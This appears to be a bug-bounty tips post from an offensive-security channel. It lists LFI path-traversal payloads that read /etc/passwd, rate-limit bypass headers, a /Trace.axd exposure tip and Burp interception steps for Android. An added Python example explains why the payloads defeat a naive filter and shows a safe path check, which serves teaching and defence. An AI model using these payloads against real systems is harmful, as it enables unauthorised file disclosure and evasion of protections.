🔥OSCP Training🔥🛡⚔️👨🏻‍💻
Offensive Security Certified Professional
@CEH_training
@WebHacking
@pfsense
@WifiHacking
🔰For safer days
Bug Bounty Tips

Sensitive Data Exposure in ASP.NET apps via the /Trace.axd endpoint

A filter bypass payload list for hunting LFI vulnerabilities:

→index.php?page=....//....//etc/passwd
→index.php?page=..///////..////..//////etc/passwd
→index.php?page=/var/www/../../etc/passwd
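
Why these values get past a sanitising filter, and the check that stops them, as an added example that is not part of the original post. It is a Python model of the path handling; `BASE`, the function names and the legitimate page name are assumptions made for the illustration.

```python
import posixpath

BASE = "/var/www"  # assumed include root (hypothetical, taken from the third value)

# The three values from the list above, plus one legitimate page name (constructed).
PAYLOADS = [
    "....//....//etc/passwd",
    "..///////..////..//////etc/passwd",
    "/var/www/../../etc/passwd",
]
LEGIT = "pages/about.php"


def resolve(page: str) -> str:
    """Model of how the file API sees the value: joined to BASE, then
    normalised. posixpath.join lets an absolute value replace BASE."""
    return posixpath.normpath(posixpath.join(BASE, page))


def inside_base(path: str) -> bool:
    """True only for BASE itself or a path below it."""
    return path == BASE or path.startswith(BASE + "/")


def weak_filter(page: str) -> str:
    """Sanitise-then-use: one non-recursive pass that deletes "../".
    "....//" collapses to "../" after the pass, so the filter builds
    the traversal it was meant to remove."""
    return resolve(page.replace("../", ""))


def safe_resolve(page: str):
    """Canonicalise-then-check: no stripping, reject anything outside BASE.
    On a real filesystem use os.path.realpath so symlinks are resolved too."""
    path = resolve(page)
    return path if inside_base(path) else None


def report():
    """Return (value, path after weak filter, result of safe_resolve) rows."""
    return [(p, weak_filter(p), safe_resolve(p)) for p in PAYLOADS + [LEGIT]]


if __name__ == "__main__":
    for value, weak, safe in report():
        print(f"{value!r}\n  weak filter  -> {weak}\n  safe_resolve -> {safe}")
```

The first value is only dangerous after the stripping pass has rewritten it; checked as-is it resolves to a directory literally named `....` inside the base, which is why the hardened version does no stripping at all.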
If you need to intercept the Android traffic through BurpSuite:
1) Ensure Burp is listening to more than the loopback address
2) Allow inbound traffic on the Firewall
3) Use ADB to run "settings put global http_proxy IP PORT"
4) Download and trust the CA from http://IP/cert
5) WIN
Forwarded from Web Hacking
Rate limit bypass using some custom headers:

X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP